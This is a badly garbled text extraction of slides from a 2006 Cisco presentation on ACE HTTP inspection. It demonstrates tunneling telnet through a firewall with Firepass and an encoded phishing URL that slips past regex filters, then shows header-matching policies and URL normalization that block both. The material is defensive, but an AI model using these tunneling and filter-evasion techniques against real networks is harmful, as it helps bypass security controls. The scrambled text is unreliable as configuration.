switch/lab# switch/lab# sh ru n acce ss-list acce ss-list http inbo u nd line 1 0 switch/lab# F b o n n e a u -a s a
client 1 0 . 2 0 . 1 0 . 1 0 0
�
� � � � ���� � �
H T T P T u nnel E x am p l e
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
e x te nd e d
C is c o C o n fid e n tia l
p e rm it tcp
any
any
e q
www 72
C l i ent -s i de f i r ep as s c o nf i g [ ro o t@ re d hatA S 4 f p clie nt]# m o re co nf /f p clie nt. ru le s # # f p clie nt. ru le s # F I R E P A S S re d ire ct ru le s f ile # V E R S I O N 1 . 1 . 2 a # # S y ntax : # lo cal_ p o rt lo cal_ p ro to co l targ e t_ nam e _ o r_ ip targ e t_ p o rt targ e t_ p ro to co l[ C R ] # # A ny nu m be r o f sp ace s o r tabs m ay se p arate the v alu e s # # E x am p le s: # 7 4 7 4 u d p 1 1 1 . 2 2 2 . 3 3 . 4 8 0 tcp # F I R E P A S S clie nt will liste n o n lo cal p o rt 7 4 7 4 /u d p and ask F I R E P A S S se rv e r # to re d ire ct d ata f lo w to targ e t se rv e r 1 1 1 . 2 2 2 . 3 3 . 4 , p o rt 8 0 /tcp . # 8 0 8 0 tcp www. p ro x y . co m 3 1 2 8 tcp # F I R E P A S S clie nt will liste n o n lo cal p o rt 8 0 8 0 /tcp and ask F I R E P A S S se rv e r # to re d ire ct d ata f lo w to targ e t se rv e r www. p ro x y . co m , p o rt 3 1 2 8 /tcp . # ################################################################################ 8 0 0 0
tc p
1 0 . 4 8 . 8 2 . 6 5
2 3
tc p
[ ro o t@ re d hatA S 4 f p clie nt]# . /f p clie nt. p l co nf /f p clie nt. co nf 1 . 1 . 2 a/f p se rv e r/f p se rv e r. cg i
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
1 0 . 1 0 . 1 0 . 1 0 1 /cg i-bin/f ire p ass-
73
H T T P T u nnel i ng i n ac t i o n 1 .
Cl i en t i n i t i a t es co n n ect i o n t o l o ca l p o r t 8 0 0 0
[ root@ red h a tA S 4
f p c l i ent] #
T ry ing
1 2 7 . 0 . 0 . 1 . . .
E scap e
characte r is ' ^ ]' .
C o nne cte d
to
tel net l oc a l h os t 8 0 0 0
lo calho st. lo cald o m ain ( 1 2 7 . 0 . 0 . 1 ) .
---------------------------------------------------------------------U se
y o u r T A C S U N
u se rid
N O T I C E
and
P A S S W O R D
to
acce ss this ho st
---------------------------------------------------------------------U se r A cce ss V e rif icatio n
P asswo rd :
-------------------------------------------------------------|
|
* * *
P le ase
d o
|
| T his ho st is m aintaine d | p ro ble m s by
su bm itting
no t alte r the
by
C A L O .
a C A L O
co nf ig . * * *
P le ase
case
re p o rt any
at http : //calo . cisco . co m
|
|
|
|
|
-------------------------------------------------------------M S F C 2 > s h V l8 2 2
F b o n n e a u -a s a
s ta nd
1 1
b ri ef 2 55
| P
i nc l
A ctiv e
8 2 . 6 5
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
lo cal
C is c o C o n fid e n tia l
1 0 . 4 8 . 8 2 . 6 6
1 0 . 4 8 . 8 2 . 6 5
74
W h at s h o w s u p i n t h e l o gs � Sep 7 2006 14:51:00 lab: %ACE-6-3 02022: B u i lt T CP c o n n ec t i o n 0x 59 f o r v lan 20:10. 20. 10. 100/ 5028 1 ( 10. 20. 10. 100/ 5028 1) t o v lan 100:10. 10. 10. 101/80 ( 10. 10. 10. 101/ 8 0) � Sep 7 2006 14:59 :00 lab: %ACE-6-3 02023 : T ear d o w n T CP c o n n ec t i o n 0x 59 f o r v lan 20:10. 20. 10. 100/ 5028 1 t o v lan 100:10. 10. 10. 101/80 d u r at i o n 0:08 :00 by t es 9 3 9 T CP
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
F I N s
75
C l i ent -s i de p ac k et dec o di ng I P , S rc: 1 0 . 2 0 . 1 0 . 1 0 0 ( 1 0 . 2 0 . 1 T C P , S rc P o rt: 50 4 1 8 ( 50 4 1 8 ) , D H y p e rte x t T ransf e r P ro to co l P O S T /cg i-bin/f ire p ass-1 . 1 . Req ues t M eth od : P O S T R e q u e st U R I : /cg i-bin/f R e q u e st V e rsio n: H T T P /1 C o nte nt-T y p e : ap p licatio n/o U se r-A g e nt: M o z illa/4 . 0 ( co H o st: 1 0 . 1 0 . 1 0 . 1 0 1 \r\n C o nte nt-L e ng th: 0 \r\n X-S es s i on: 7 \r\n X-C ounter: 1 \r\n X-C o nne ctio n: aliv e \r\n X-H os t: 1 0 . 4 8 . 8 2 . 6 5 \r\n X-P ort: 2 3 \r\n X-P roto: tc p \r\n \r\n
0 . 1 0 0 ) , D st: 1 0 . 1 0 . 1 0 . 1 0 1 ( 1 0 . 1 0 . 1 0 . 1 0 1 ) st P o rt: http ( 8 0 ) , S e q : 1 , A ck : 1 , L e n: 2 a/f p se rv e r/f p se rv e r. cg i H T T P /1 . 1 \r\n ire p ass-1 . 1 . 2 a/f p se rv e r/f p se rv e r. cg i . 1 cte t-stre am \r\n m p atible ; M S I E 6 . 0 ; W ind o ws 9 8 ) \r\n
S erver resp on ds w it h 2 0 0 a n d oc t ec t -st rea m t o del iver da t a b a c k t o c l ien t F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
2 9 9
C is c o C o n fid e n tia l
I n t erp ret ed b y t h e server-side f irep a ss t u n n el a p p l ic a t ion Hypertext Transfer Protocol HTTP/ 1 . 1 2 0 0 O K \r\n R eq u est V ersi on: HTTP/ 1 . 1 R esponse C od e: 2 0 0 D ate: F ri , 0 8 S ep 2 0 0 6 0 8 : 5 7 : 3 2 G M T\r\n S erv er: A pach e/ 2 . 0 . 4 0 ( R ed Hat L i nu x) \r\n X-C onnecti on: ali v e\r\n C ontent-L eng th : 3 0 1 \r\n C onnecti on: close\r\n C ontent-Type: appli cati on/ octet-stream \r\n \r\n M ed i a Type: appli cati on/ octet-stream ( 3 0 1 b ytes) 76
S o h o w
do I b l o c k t h at t r af f i c ??
� Drastic so l utio n: b l o ck P O ST req uest m etho d , b ut l ik el y to b reak b ro w sing to to ns o f w eb sites � B etter so l utio n: b uil d custo m
reg ex to catch X-h e a d e r s
Firep as s c lient id entif ies c o nnec tio n u s ing th es e h ead ers : • X-Ses s io n • X-C o u nter
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
77
L et ’s b u i l d t h e p o l i c y o n AC E 1 .
Def in e a c l a ss-m a p t h a t m a t c h es p ort 8 0 :
2 .
B u il d h ea der reg ex es: if w e see b ot h h ea ders, m a t c h !
3 .
I n st ru c t A C E t o drop p a c k et s t h a t m a t c h t h e reg ex
4 .
A p p l y t h e H T T P p ol ic y t o p ort -8 0 t ra f f ic :
5 .
switch/lab( co nf ig ) # class-m ap m atch-any switch/lab( co nf ig -cm ap ) # m atch p o rt tcp switch/lab( switch/lab( v alu e . switch/lab( v alu e .
co nf ig ) # class-m ap ty p e http insp e ct m a tc h -a l l he ad e rs co nf ig -cm ap -http -insp ) # m atch he ad e r X-C ounter he ad e r* co nf ig -cm ap -http -insp ) # m atch he ad e r X-S es s i on he ad e r*
switch/lab( co nf ig ) # p o licy -m ap ty p e insp e ct http switch/lab( co nf ig -p m ap -ins-http ) # class he ad e rs switch/lab( co nf ig -p m ap -ins-http -c) # re se t
all-m atch htp o licy
switch/lab( co nf ig ) # p o licy -m ap m u lti-m atch no f ire p ass switch/lab( co nf ig -p m ap ) # class http switch/lab( co nf ig -p m ap -c) # insp e ct http p o licy htp o licy
M a p t h e p ol ic y t o t h e c l ien t -side in t erf a c e: switch/l a b ( co n f ig ) #
in t v l a n
switch/l a b ( co n f ig -if ) #
F b o n n e a u -a s a
http e q www
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
2 0
se r v ice -p o l icy
C is c o C o n fid e n tia l
u rl-lo g g ing
in p u t n o f ir e p a ss
78
V er i f i c at i o n 1 .
L og w h en H T T P f il t erin g p ol ic y is a p p l ied: l a b % A C E -6-3 0 2 0 2 2 : Built TCP connection 0 x 7 6 f o r v l a n 1 0 0 : 1 0 . 1 0 . 1 0 . 1 0 1 /8 0 ( 1 0 . 1 0 . 1 0 . 1 0 1 /8 0 ) l a b % A C E -5-3 0 4 0 0 1 : U s er : 1 0 . 2 0 . 1 0 . 1 0 0 1 . 1 . 2 a / f p s er v er / f p s er v er . cg i
A cces s ed
v l a n 2 0 : 1 0 . 2 0 . 1 0 . 1 0 0 /52 4 3 1
U R L
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
to
1 0 . 1 0 . 1 0 . 1 0 1 : / cg i-b in/ f ir ep a s s -
l a b % A C E -6-3 0 2 0 2 3 : Tea r d ow n TCP connection 0 x 7 6 f o r d u r a tio n 0 : 0 0 : 0 0 b y te s 50 8 Policy Clos e
S o u rce : 1 0 . 1 0 . 1 0 . 1 0 1 ( 1 0 . 1 0 . 1 0 . 1 0 1 ) D e stinatio n: 1 0 . 2 0 . 1 0 . 1 0 0 ( 1 0 . 2 0 . 1 0 T ransm issio n C o ntro l P ro to co l, S rc ( 52 54 1 ) , S e q : 1 , A ck : 2 6 5, L e n: 0 S o u rce p o rt: http ( 8 0 ) D e stinatio n p o rt: 52 54 1 ( 52 54 1 ) S e q u e nce nu m be r: 1 ( re lativ e A ck no wle d g e m e nt nu m be r: 2 6 5 ( H e ad e r le ng th: 2 0 by te s F lag s: 0 x 0 0 1 4 ( R S T , A C K ) 0 . . . . . . . = C o ng e stio n W ind o . 0 . . . . . . = E C N -E cho : N o t se . . 0 . . . . . = U rg e nt: N o t se t . . . 1 . . . . = A ck no wle d g m e nt: . . . . 0 . . . = P u sh: N o t se t . . . . . 1 . . = Res et: S et . . . . . . 0 . = S y n: N o t se t . . . . . . . 0 = F in: N o t se t W ind o w siz e : 1 7 4 0 8 C he ck su m : 0 x 7 6 2 9 [ co rre ct]
( 1 0 . 2 0 . 1 0 . 1 0 0 /52 4 3 1 )
v l a n 2 0 : 1 0 . 2 0 . 1 0 . 1 0 0 /52 4 3 1
. 1 0 0 ) P o rt:
http
se q u e nce re lativ e w R e d u ce d t
( 8 0 ) ,
to
v l a n 1 0 0 : 1 0 . 1 0 . 1 0 . 1 0 1 /8 0
D st P o rt:
52 54 1
nu m be r) ack nu m be r) ( C W R ) :
N o t se t
S e t
79
HTTP inspection in action URL c a n o n i c a l i z a t i o n
fb o n n e a u @
c is c o .c o m
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
80
H T T P insp ec tion URL Normalization
Normalization of all traffic to a canonical form before applying policies
–fe a tu r e o n ly fo u n d o n
A C E , A VS &
A S A
d5opx;ÐÓG E ] Ì €³ó â = [ Z ܾ ç - Ù ‰V ð „'‰ '5@ Ì ¿êÜ �Ýë ;u % 2 F h ome pa g e % 2 F i nde x% 2 / h ome pa g e / i nde x/ pi c t u r e s / g og . h t ml ³7 J M µ4 [ ø�Èò¾ ø má ¼
Terminate and decrypt SSL
N o rmal iz e
A ppl y Secu rity P o l icy
Stops attacks disguised by encoding URLs F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
81
B y p as s i ng r egex / I P S f i l t er s • I nsert yo ur f av o rite av erag e p hishing U R L : •h t t p : / / r d s . y a h o o . c d w R s A 1 d T M Q R w * * h ttp % 3 a //1 9 8 .1 3 68 % 7 7 % 2 F % 6D % % 7 5 % 63 % 7 4% 7 3 3 % 64% 3 8 % 3 0 % 3
o m b 3 M 3 .2 6F % 5 4%
/_ y lt= A 0 L a D M w R z Z 1 9 . 2 5 / % 65 % 64% 7 5 % F % 64% 61 3 5 % 3 8 % 3
S V 66f N t D W M D c 3 IE % 6E % 2 F 6C % 65 % % 7 4% 61 % 6% 3 1 % 62
g .k A U o J X N y o A ;_ y lu = X d n R p Z A N G N jU 1 X z c 1 /S % 5 5 % 5 3 % 2 F % 7 0 % 7 2 % 7 3 % 2 F % 7 0 % 7 3 % 3 2 % 3 5 F % 7 3 % 68 % 65 % 65 % % 2 E % 68 % 7 4% 6D % 6C
•H ere’s w hat A C E / P I X sho w ACE-5-3 0 4 0 0 1 : U s e r : 1 0 . 4 8 . 8 2 . 1 0 4 /_y l t = 3 IE d n % 7 0 % 3 6 % 2 % 6 5 %
F b o n n e a u -a s a
A 0 L a R p Z 7 2 % F % 7 6 3 %
S V A N 6 F 0 % 6 4
6 6 fN G N jU % 6 4 7 2 % % 3 8
tD g .k 1 X z c % 7 5 % 6 F % 6 % 3 0 %
A U 1 /S 6 3 4 % 3 4
o J X N y o A IG = 1 4 8 v % 7 4 % 7 3 7 5 % 6 3 % % 3 5 % 3 8
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
; _y l u = X 3 s d 1 j p /E X % 2 F % 6 8 7 4 % 7 3 % % 3 6 % 3 1
C is c o C o n fid e n tia l
E 2 8 5 2 F 4 % 2 E
M T E 2 Z H 1 48 v s d 1 % 64% 7 5 3 0 % 3 6% 3 0 % 3 9 %
V u Z 3 E 3 B G N v b G 8 D j p / E X P = 1 1 3 8 5 441 8 6/ % 63 % 7 4% 7 3 % 2 F % 2 F % 7 0 % 7 2 % 6F % 64 3 0 % 3 0 % 61 % 65 % 6
w hen l o g g ing that U R L :
Ac c e s s e d
o D M T P = 1 1 3 % 7 7 % 5 F % 6 % 6 2 %
3 o D IG = 6F 7 % 7 4%
Z H V 4 4 1 8 % 6 D 6 1 % % 6 8
u Z 3 E 6 /* * h % 6 F 7 4 % % 7 4
U R L 3 B ttp % 6 1
G N % 3 6 4 % % 5 % 6 D %
2 1 6. 1 0 9 . 1 1 7 . 1 3 6: / _
v b G 8 D d w R s A a //1 9 8 . 1 3 3 . 2 1 9 7 5 % 6 C % 6 5 % F % 7 3 % 6 8 % 6 5 6 C
1 d T M . 2 5 /% 7 3 % 2 % 6 5 %
Q R 6 5 F % 7 4
w b % 6 7 0 % 3
3 M D E % 2 % 7 3 0 % 3
M w F % % 3 9 %
R z Z 5 5 % 2 % 3 3 0 %
W M 5 3 % 7 % 3 3 0 %
D c 2 F 0 % 6 1
82
AC E no r m al i z es t h e U R L W rite y o u r reg ex in p lain A SC I I – A C E tak es c are o f th e res t clas s -map type h ttp ins pect match -any tes th ttp 2 match u rl . * d ata_ s h eet
S e p 1 3 2 0 0 6 1 8 : 4 9 : 2 7 Ad m i n : % ACE-6-3 0 2 0 2 2 : B u i l t v l a n 1 8 2 2 : 1 0 . 4 8 . 8 2 . 1 0 4 / 59 9 9 1 ( 1 0 . 4 8 . 8 2 . 1 0 4 / 59 9 9 1 ) v l a n 8 2 2 : 2 1 6. 1 0 9 . 1 1 7 . 1 3 6/ 8 0 ( 2 1 6. 1 0 9 . 1 1 7 . 1 3 6/ 8 0 ) S e p 2 1 6 .1 /_y l t = 3 IE d n % 7 0 % 3 6 % 2 % 6 5 %
1 3 2 0 0 6 0 9 .1 1 7 .1 A 0 L a S V 6 R p Z A N G 7 2 % 6 F % F % 7 0 % 7 6 3 % 6 4 %
1 8 : 4 9 : 2 7 3 6 :/_ 6 fN tD g .k A U N j U 1 X z c 1 /S 6 4 % 7 5 % 6 3 2 % 6 F % 6 4 % 3 8 % 3 0 % 3 4
A d m in: o J X N y o A IG = 1 4 8 v % 7 4 % 7 3 7 5 % 6 3 % % 3 5 % 3 8
% A C E -5-3 0 4 0 0 1 : ; _y l u = X 3 s d 1 j p /E X % 2 F % 6 8 7 4 % 7 3 % % 3 6 % 3 1
o D M T P = 1 1 3 % 7 7 % 5 F % 6 % 6 2 %
E 2 8 5 2 F 4 % 2 E
Z H V 4 4 1 8 % 6 D 6 1 % % 6 8
T CP t o
U se r: 1 0 . 4 8 . 8 2 . 1 0 4 u Z 3 E 6 /* * h % 6 F 7 4 % % 7 4
3 B ttp % 6 1
G N % 3 6 4 % % 5 % 6 D %
v b G 8 D d w R s A a //1 9 8 . 1 3 3 . 2 1 9 7 5 % 6 C % 6 5 % F % 7 3 % 6 8 % 6 5 6 C
c o n n e c t i o n
0 x 3 5 f o r
Accessed URL 1 d T M . 2 5 /% 7 3 % 2 % 6 5 %
Q R 6 5 F % 7 4
w b % 6 7 0 % 3
3 M D E % 2 % 7 3 0 % 3
M w F % % 3 9 %
R z Z 5 5 % 2 % 3 3 0 %
W M 5 3 % 7 % 3 3 0 %
D c 2 F 0 % 6 1
S e p 1 3 2 0 0 6 1 8 : 4 9 : 2 7 Ad m i n : % ACE-6-3 0 2 0 2 3 : T e a r d o w n T CP c o n n e c t i o n 0 x 3 5 f o r v l a n 1 8 2 2 : 1 0 . 4 8 . 8 2 . 1 0 4 / 59 9 9 1 t o v l a n 8 2 2 : 2 1 6. 1 0 9 . 1 1 7 . 1 3 6/ 8 0 d u r a t i o n 0 : 0 0 : 0 0 b y t e s 8 59 P o l i c y Cl o s e F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
83
Q&A
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
84
� R etro u v ez c h aq u e m o is l’ac tu alité C is c o s u r C is c o M ag , la news letter d e C is c o Franc e A b o nnem ent : www.c is c o .f r/ g o / c is c o m ag
� Sém inaire s o lu tio ns : L e rés eau d e C am p u s J eu d i 2 4 m ai 2 0 0 7 en m atinée à l’I ns titu t O c éano g rap h iq u e - P aris
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
85
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
86
